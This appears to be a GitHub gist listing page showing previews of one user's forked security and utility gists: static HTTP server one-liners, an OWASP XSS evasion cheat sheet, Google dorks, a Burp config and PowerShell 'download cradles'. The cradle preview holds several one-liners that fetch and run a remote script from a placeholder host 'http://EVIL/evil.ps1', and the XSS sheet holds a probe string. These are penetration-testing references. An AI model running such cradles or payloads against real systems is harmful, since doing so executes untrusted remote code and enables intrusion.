Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
lowk3v
/ xss-owasp-cheatsheet
Created
October 23, 2016 02:45
— forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet | |
| # based on the RSnake original http://ha.ckers.org/xss.html | |
| # Retrieved on 2013-11-20 | |
| # Much of this wildly obsolete | |
| # | |
| # XSS Locator 2 | |
| '';!--"<XSS>=&{()} |
lowk3v
/ google-dorks
Created
June 10, 2018 18:49
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
lowk3v
/ web-servers.md
Created
June 27, 2018 11:42
— forked from willurd/web-servers.md
Big list of http static server one-liners
lowk3v
/ alexa.js
Created
August 16, 2018 10:06
— forked from chilts/alexa.js
Getting the Alexa top 1 million sites directly from the server, unzipping it, parsing the csv and getting each line as an array.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var request = require('request'); | |
| var unzip = require('unzip'); | |
| var csv2 = require('csv2'); | |
| request.get('http://s3.amazonaws.com/alexa-static/top-1m.csv.zip') | |
| .pipe(unzip.Parse()) | |
| .on('entry', function (entry) { | |
| entry.pipe(csv2()).on('data', console.log); | |
| }) | |
| ; |
lowk3v
/ DownloadCradles.ps1
Created
January 16, 2019 11:20
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
lowk3v
/ burp_defaults_combined.json
Created
June 26, 2024 02:54
— forked from asadasivan/burp_defaults_combined.json
Burp Default Configuration file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "project_options":{ | |
| "connections":{ | |
| "hostname_resolution":[], | |
| "out_of_scope_requests":{ | |
| "advanced_mode":false, | |
| "drop_all_out_of_scope":false, | |
| "exclude":[], | |
| "include":[], | |
| "scope_option":"suite" |